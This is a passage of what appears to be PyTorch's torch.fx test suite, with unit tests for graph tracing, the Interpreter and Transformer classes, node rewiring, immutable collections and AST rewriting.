env_key_names = set(n.name for n in interp.env.keys())
self.assertEqual(env_key_names, set(['output']))
def test_interpreter_default_args(self):
class Model(torch.nn.Module):
def forward(self, x, y=3.14159):
return x + y
model = Model()
gm = torch.fx.symbolic_trace(model)
interp = Interpreter(gm)
x = torch.randn(5, 3)
out = interp.run(x)
torch.testing.assert_allclose(out, x + 3.14159)
def test_interpreter_not_enough_args(self):
class Model(torch.nn.Module):
def forward(self, x, y):
return x + y
model = Model()
gm = torch.fx.symbolic_trace(model)
interp = Interpreter(gm)
x = torch.randn(5, 3)
with self.assertRaisesRegex(RuntimeError,
'Expected positional argument for parameter y, but one was not passed in'):
out = interp.run(x)
def test_transformer_noop(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_transformer_op_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
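# Unlike the Interpreter variant above, Transformer produces a new GraphModule with the
# swapped ops baked into its graph.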
class NegSigmSwapXformer(Transformer):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(target, args, kwargs)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(target, args, kwargs)
transformed = NegSigmSwapXformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(transformed(input), torch.neg(input).sigmoid())
def test_transformer_multi_outputs(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
x = x + self.param
out = self.linear(x)
return x, out
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_fn_type_annotations(self):
class Foo(torch.nn.Module):
def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]:
return {'a': p.x + p.y + z + i}
foo_scripted = torch.jit.script(Foo())
foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
fxed = symbolic_trace(Foo())
fxed_scripted = torch.jit.script(fxed)
fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
def test_fn_type_annotation_empty(self):
def forward(a : List[torch.Tensor]):
return a[0]
torch.jit.script(symbolic_trace(forward))
def test_wrapped_method(self):
def wrap_with_relu(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
return torch.relu(fn(*args, **kwargs))
return wrapper
class Foo(torch.nn.Module):
@wrap_with_relu
def forward(self, x, w):
return torch.matmul(x, w)
f = Foo()
traced = symbolic_trace(f)
x, w = torch.rand(3, 4), torch.rand(4, 4)
self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes))
def test_empty_graph_codegen(self):
graph = torch.fx.Graph()
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(gm(), None)
def test_sequential(self):
m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1))
gm = torch.fx.symbolic_trace(m)
gm_copy = copy.deepcopy(gm)
def test_ctx_mgr(self):
@contextlib.contextmanager
def do_nothing():
yield
class M(torch.nn.Module):
def __init__(self):
super().__init__()
@do_nothing()
def forward(self, x):
return torch.relu(x)
m = M()
self.checkGraphModule(m, (torch.rand(3, 4),))
def test_typename_print(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,),
type_expr=List[float])
output : torch.fx.Node = graph.output(b)
self.assertTrue('typing.List[float]' in str(graph))
def test_layout(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
return torch.empty_like(x, layout=torch.strided, pin_memory=False).fill_(0)
traced = symbolic_trace(M())
x = torch.rand(5, 9, 3, 4)
self.assertEqual(traced(x), torch.zeros_like(x))
def test_ellipsis(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y):
return x + y[:, 1:10, ...]
traced = symbolic_trace(M())
x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4)
self.assertEqual(traced(x, y), x + y[:, 1:10, ...])
def test_inf_nan(self):
class FooMod(torch.nn.Module):
def forward(self, x):
return x + float('inf'), x + float('-inf'), x + float('nan')
fm = FooMod()
self.checkGraphModule(fm, (torch.rand(3, 4),))
def test_inf_nan_kwds(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf')
c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan')
graph.output((b, c))
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
x = torch.rand(3, 4)
self.assertEqual(gm(x), (x + float('inf'), x + float('nan')))
def test_deepcopy_recursion_depth(self):
depth = sys.getrecursionlimit() + 20
g = torch.fx.Graph()
x = g.placeholder('x')
for i in range(depth):
x = g.call_function(torch.relu, (x,))
g.output(x)
copied_graph = copy.deepcopy(g)
val_map = {}
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
val_map[orig_node] = new_node
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
orig_users = set(orig_node.users.keys())
orig_users_equiv = set(val_map[u] for u in orig_users)
new_users = set(new_node.users.keys())
self.assertEqual(orig_users_equiv, new_users)
@skipIfNoTorchVision
def test_replace_uses(self):
rn18 = torchvision_models.resnet18()
class LowerReluTracer(torch.fx.Tracer):
def is_leaf_module(self, m : torch.nn.Module, qualname : str):
if isinstance(m, torch.nn.ReLU):
return False
return super().is_leaf_module(m, qualname)
rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18))
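# Tracing ReLU modules as non-leaves exposes them as call_function nodes
# (torch.relu / torch.nn.functional.relu) that can then be swapped for torch.neg below.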
to_erase = []
for node in rn18_traced.graph.nodes:
if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]:
kwargs = node.kwargs.copy()
# Neg doesn't have in-place
kwargs.pop('inplace')
with rn18_traced.graph.inserting_before(node):
new_node = rn18_traced.graph.call_function(
the_function=torch.neg, args=node.args, kwargs=kwargs)
node.replace_all_uses_with(replace_with=new_node)
to_erase.append(node)
for node in to_erase:
rn18_traced.graph.erase_node(node)
def test_replace_input(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.replace_input_with(x, y)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input_x = torch.randn(33, 44)
input_y = torch.randn(11, 22)
self.assertEqual(gm(input_x, input_y), torch.relu(input_y))
def test_insertion_point(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
with graph.inserting_before(b):
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
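# Rewire relu's first argument from x to the newly inserted neg node so the graph
# computes relu(neg(x)).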
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_update_args_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_arg(0, y)
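# update_arg rewires relu's positional input from x to y; building a new GraphModule
# over the same (mutated) graph picks up the change.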
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_update_kwargs_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, kwargs={'input': x})
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_kwarg('input', y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_immutable_list_pytree_ops(self):
rand_tensor = torch.randn(5, 3)
l = immutable_list([3, [rand_tensor, 42]])
flattened, spec = pytree.tree_flatten(l)
assert flattened == [3, rand_tensor, 42]
unflattened = pytree.tree_unflatten(flattened, spec)
assert unflattened == l
assert isinstance(unflattened, immutable_list)
def test_immutable_dict_pytree_ops(self):
rand_tensor = torch.randn(5, 3)
d = immutable_dict({'a': 3, 'b': [rand_tensor, 42]})
flattened, spec = pytree.tree_flatten(d)
assert flattened == [3, rand_tensor, 42]
unflattened = pytree.tree_unflatten(flattened, spec)
assert unflattened == d
assert isinstance(unflattened, immutable_dict)
def test_move_before(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
b.prepend(neg)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_prepend_self(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.prepend(b)
x.append(b)
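# Prepending a node to itself is a no-op, and appending b after x leaves it where it
# already was, so the graph still contains exactly x, relu, and output.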
self.assertEqual(len(graph.nodes), 3)
def test_erase_node_error(self):
st = SimpleTest()
traced = symbolic_trace(st)
for node in traced.graph.nodes:
# Test deleting with uses both in another Node and at the output
if node.target in [operator.add, torch.relu]:
with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'):
traced.graph.erase_node(node)
def test_copy_it(self):
d = immutable_dict([(3, 4), (5, 6)])
l = immutable_list([(3, 4), (5, 6)])
self.assertEqual(d, deepcopy(d))
self.assertEqual(l, deepcopy(l))
def test_get_torch_func_signature(self):
for key in dir(torch):
obj = getattr(torch, key)
if callable(obj):
schemas = get_signature_for_torch_op(obj)
def test_find_uses(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
y = torch.relu(x)
z = x + x
u = torch.neg(x)
graph.output((y + z + u).node)
graph.lint()
users_of_x = x.node.users
self.assertEqual(len(users_of_x), 3)
expected_ops = set(['relu', 'add', 'neg'])
for use in users_of_x:
assert any(use.name.startswith(prefix) for prefix in expected_ops)
def test_inline_graph(self):
class InlineInto(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class ToInline(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
inline_into = symbolic_trace(InlineInto())
to_inline = symbolic_trace(ToInline())
combined_graph = torch.fx.Graph()
output_node = combined_graph.graph_copy(inline_into.graph, {})
input_node = list(to_inline.graph.nodes)[0]
assert input_node and input_node.op == 'placeholder'
val_map = {input_node : output_node}
output = combined_graph.graph_copy(to_inline.graph, val_map)
combined_graph.output(output)
combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph)
input = torch.rand(3, 4)
self.assertEqual(combined_module(input), input.relu().neg())
def test_multi_insert_point(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
relu = torch.relu(x)
with graph.inserting_before(relu.node):
y = torch.neg(x)
z = torch.tanh(y)
graph.output((relu.node, z.node))
graph.lint()
expected_ops = ['x', 'neg', 'tanh', 'relu']
for node, expected in zip(graph.nodes, expected_ops):
assert expected in node.name
def test_reassign_args_kwargs_uses(self):
graph = torch.fx.Graph()
x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y'))
z = x + y
zed = z + z + z
graph.output(zed.node)
graph.lint()
# zed = z + z + z -> zed = z + z + x
zed.node.args = (zed.node.args[0], x.node)
self.assertEqual(list(x.node.users.keys()), [z.node, zed.node])
# z = x + y -> z = y + y
z.node.args = (y.node, y.node)
self.assertEqual(list(x.node.users.keys()), [zed.node])
def test_trace_function(self):
def foo(x, y):
return torch.relu(x) + y
x, y = torch.randn(3, 4), torch.randn(3, 4)
self.checkGraphModule(foo, (x, y))
def test_trace_dict_int_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[int, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({42: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
traced_graph = MyTracer().trace(CallsModWithDict())
def test_trace_dict_proxy_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[torch.Tensor, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({x: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'):
traced_graph = MyTracer().trace(CallsModWithDict())
def test_module_deepcopy_edit_nodes(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
traced1 = symbolic_trace(Foo())
copied = copy.deepcopy(traced1)
for node in copied.graph.nodes:
if node.target == torch.relu:
node.target = torch.neg
copied.recompile()
traced1.recompile()
x = torch.randn(15, 15)
torch.testing.assert_allclose(traced1(x), torch.relu(x))
torch.testing.assert_allclose(copied(x), torch.neg(x))
def test_direct_param_use(self):
class TransposeTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.b = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.b
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
self.a = TransposeTest()
def forward(self, x):
return self.a.b, self.a.b.t(), self.a.b.view(12)
traced = torch.fx.symbolic_trace(Foo())
assert all('constant' not in node.target for node in traced.graph.nodes)
def test_single_default_arg(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1):
return y
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
def test_multiple_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1, z=2):
return y + z
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
self.checkGraphModule(m, (3, 4))
def test_regular_and_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y=1):
return x + y
m = M()
self.checkGraphModule(m, (2,))
self.checkGraphModule(m, (2, 3))
def test_string_literal_return(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self):
return "foo"
m = M()
self.checkGraphModule(m, ())
def test_namedtuple_return_qualname(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return MyNamedTup(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), MyNamedTup(input, input))
def test_update_args_kwargs_yells_at_you(self):
symtraced = symbolic_trace(SimpleTest())
node = next(iter(symtraced.graph.nodes))
with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'):
node.__update_args_kwargs((), {})
def test_torchbind_class_attribute_in_fx(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping")
class FooBar1234(torch.nn.Module):
def __init__(self):
super(FooBar1234, self).__init__()
self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"])
def forward(self):
return self.f.top()
m = FooBar1234()
self.checkGraphModule(m, ())
def test_torchbind_class_attribute_in_fx_tensor_arg(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping")
class FooBar2341(torch.nn.Module):
def __init__(self):
super(FooBar2341, self).__init__()
self.f = torch.classes._TorchScriptTesting._ReLUClass()
def forward(self, x):
return self.f.run(x)
m = FooBar2341()
traced = symbolic_trace(m)
input = torch.randn(3, 4)
self.assertEqual(traced(input), m(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_script_method_trace(self):
class Scripted(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class Holder(torch.nn.Module):
def __init__(self):
super().__init__()
self.s = torch.jit.script(Scripted())
def forward(self, x):
return self.s(x)
h = Holder()
traced = symbolic_trace(h)
input = torch.randn(3, 4)
self.assertEqual(traced(input), h(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_namedtuple_return_trace(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return Pair(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), Pair(input, input))
def test_named_tuple_inlined(self):
class NamedTupMod(torch.nn.Module):
def forward(self, inp):
return wrapped_named_tup(Pair(inp, 1.2), p2=Pair(3.4, inp))
m = NamedTupMod()
input = torch.rand(3, 4)
ref = m(input)
traced = symbolic_trace(m)
res = traced(input)
self.assertEqual(ref, res)
# Check Pair NamedTuple works when inlined into the function call.
ph = call_func = None
for node in traced.graph.nodes:
if node.op == "placeholder":
ph = node
elif node.op == "call_function" and node.target == wrapped_named_tup:
node.update_arg(0, Pair(ph, 1.2))
node.update_kwarg("p2", Pair(3.4, ph))
call_func = node
break
self.assertTrue(call_func is not None)
self.assertTrue(isinstance(call_func.args[0], Pair))
self.assertTrue(isinstance(call_func.kwargs["p2"], Pair))
self.assertEqual(_format_arg(call_func.args[0]), "Pair(x=%inp, y=1.2)")
self.assertEqual(_format_arg(call_func.kwargs["p2"]), "Pair(x=3.4, y=%inp)")
traced.graph.eliminate_dead_code()
traced.recompile()
res = traced(input)
self.assertEqual(ref, res)
def test_return_type_exists(self):
class ReturnTypeModule(torch.nn.Module):
def other(self, x: List[str]) -> List[str]:
return x
def forward(self, x: List[str]) -> List[str]:
return self.other(x)
traced = symbolic_trace(ReturnTypeModule())
self.assertIn("-> typing_List[str]", traced._code)
scripted = torch.jit.script(traced)
self.assertIn("-> List[str]", scripted.code)
def getitem_inner(self):
class GetItemBase(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer('pe', torch.randn(8, 8))
class GetItem1(GetItemBase):
def forward(self, x):
return self.pe[:, :x.size(0)]
class GetItem2(GetItemBase):
def forward(self, x):
return self.pe[x.size(0)]
class GetItem3(GetItemBase):
def forward(self, x):
return self.pe[4] # fx creates `self._tensor_constant0` here
self.checkGraphModule(GetItem1(), [torch.zeros(4)])
self.checkGraphModule(GetItem2(), [torch.zeros(4)])
self.checkGraphModule(GetItem3(), [torch.zeros(4)])
@unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1",
"Will be checked in test_getitem_subproc")
def test_getitem(self):
self.getitem_inner()
def test_getitem_subproc(self):
# need to run this test in a subproc to work around:
# https://github.com/pytorch/pytorch/issues/50710
proc = Process(target=run_getitem_target)
proc.start()
proc.join()
self.assertEqual(proc.exitcode, 0)
def test_user_friendly_call_provenance_with_function(self):
def fn(x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(fn)
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'fn.forward'"):
scripted = torch.jit.script(traced)
def test_user_friendly_call_provenance_with_module(self):
class M(torch.nn.Module):
def forward(self, x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(M())
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'M.forward'"):
scripted = torch.jit.script(traced)
def test_snake_case(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.activations = torch.nn.ModuleDict([
["snake_case", torch.nn.ReLU()],
["PascalCase", torch.nn.LeakyReLU()],
["ALL_CAPS", torch.nn.PReLU()]
])
def forward(self, x):
a = self.activations["snake_case"](x)
b = self.activations["PascalCase"](x)
c = self.activations["ALL_CAPS"](x)
return a, b, c
traced = symbolic_trace(M())
check = [
("activations_snake_case", "activations.snake_case"),
("activations_pascal_case", "activations.PascalCase"),
("activations_all_caps", "activations.ALL_CAPS")
]
i = 0
for node in traced.graph.nodes:
if node.op == "placeholder" or node.op == "output":
continue
name = check[i][0]
target = check[i][1]
self.assertEqual(name, node.name)
self.assertEqual(target, node.target)
i += 1
self.assertEqual(i, 3)
def test_no_mutation(self):
from torch.fx.immutable_collections import immutable_list
x = immutable_list([3, 4])
with self.assertRaisesRegex(NotImplementedError, "new_args"):
x[0] = 4
def test_partial_trace(self):
class Foo(torch.nn.Module):
def forward(self, x, y):
if y:
return 2 * x
else:
return x
mod = Foo()
mod_true = symbolic_trace(mod, concrete_args={'y': True})
mod_false = symbolic_trace(mod, concrete_args={'y': False})
self.assertEqual(mod_true(3, True), 6)
print(mod_true.code)
assert(any([i.target == torch._assert for i in mod_true.graph.nodes]))
with self.assertRaises(AssertionError):
mod_true(3, False)
self.assertEqual(mod_false(3, False), 3)
with self.assertRaises(AssertionError):
mod_false(3, True)
def f_higher(a, f):
return f(a)
nf = symbolic_trace(f_higher, concrete_args={'f': lambda x: x * 2})
self.assertEqual(nf(3, lambda x: x * 2), 6)
def test_custom_traceback_raised_when_exception_source_is_graphmodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.W = torch.nn.Parameter(torch.randn(5))
def forward(self, x):
return torch.dot(self.W, x)
traced = torch.fx.symbolic_trace(M())
out = [n for n in traced.graph.nodes if n.op == "output"][-1]
with traced.graph.inserting_before(out):
relu_out = traced.graph.call_method(method_name='relu',
args=(out.args[0],))
out.args = (relu_out,)
traced.recompile()
with self.capture_stderr() as captured:
with self.assertRaises(TypeError):
traced(5)
self.assertRegex(captured[0],
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_custom_traceback_not_raised_when_exception_source_is_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(3, 4)
def forward(self, x):
return self.linear(x)
traced = torch.fx.symbolic_trace(M())
# Do not change this to `capture_stderr` or another context
# manager without ensuring that the output is as expected
try:
traced(torch.rand(5, 5))
except RuntimeError:
captured = traceback.format_exc()
self.assertNotRegex(captured,
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_graph_module_replicate_for_dp(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
gm = torch.fx.symbolic_trace(Foo())
x = torch.randn(5, 3)
out = gm(x)
replica = gm._replicate_for_data_parallel()
out_replica = replica(x)
torch.testing.assert_allclose(out_replica, out)
def test_ast_rewriter_rewrites_assert(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_rewrites_assert_with_message(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z, "msg"
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_throw_out_variant(self):
def foo(x):
y = torch.rand_like(x)
torch.sigmoid(x, out=y)
return y
class MyTracer(torch.fx.Tracer):
check_mutable_operations = True
tracer = MyTracer()
with self.assertRaisesRegex(RuntimeError, 'mutable operation aten::sigmoid.out'):
traced_graph = tracer.trace(foo)
def test_ast_rewriter_reassigns_submodules(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.bn = torch.nn.BatchNorm2d(100)
def forward(self, x: torch.Tensor):
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf((4, y), 3)
+ a_lifted_leaf((3, 4), 5)
+ a_lifted_leaf((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_ast_rewriter_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf2((4, y), 3)
+ a_lifted_leaf2((3, 4), 5)
+ a_lifted_leaf2((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf2", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_profiler_ranges_side_effect(self):
g = torch.fx.Graph()
handle = g.call_function(torch.ops.profiler._record_function_enter_new, ('test_range',))
g.call_function(torch.ops.profiler._record_function_exit, (handle,))
g.output(None)
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
list(found_targets.keys()),
[torch.ops.profiler._record_function_enter_new, torch.ops.profiler._record_function_exit]
)
g.eliminate_dead_code()
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
list(found_targets.keys()),
[torch.ops.profiler._record_function_enter_new, torch.ops.profiler._record_function_exit]
)
def test_ast_rewriter_wrapped_via_decorator(self):
class F(torch.nn.Module):
def forward(self, x):
return wrapped_via_decorator(x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(F())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(traced).transform()
self.assertIn("wrapped_via_decorator", transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_with_submodule", traced.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), traced(input))
def test_submodule_manipulation_API(self):
class C(torch.nn.Module):
def __init__(self):
super(C, self).__init__()
self.conv = torch.nn.Conv2d(16, 33, 3, stride=2)
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.conv(torch.cat([self.param, x]))
class B(torch.nn.Module):
def __init__(self):
super(B, self).__init__()
self.linear = torch.nn.Linear(100, 200)
self.register_buffer("buf", torch.randn(2, 3))
self.net_c = C()
def forward(self, x):
return self.linear(torch.cat([self.buf, self.net_c(x)]))
class A(torch.nn.Module):
def __init__(self):
super(A, self).__init__()
self.net_b = B()
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.net_b(x) + self.param
a = symbolic_trace(A())
a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2))
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1]
with a.graph.inserting_before(conv):
with warnings.catch_warnings(record=True) as w:
